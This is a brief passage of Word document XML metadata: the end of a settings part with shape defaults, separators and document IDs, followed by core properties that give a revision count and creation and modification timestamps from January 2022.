    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val="."/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="7486B7CE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BD1517AB-4120-409E-B619-83E7D1D4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38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-07T15:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-07T20:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>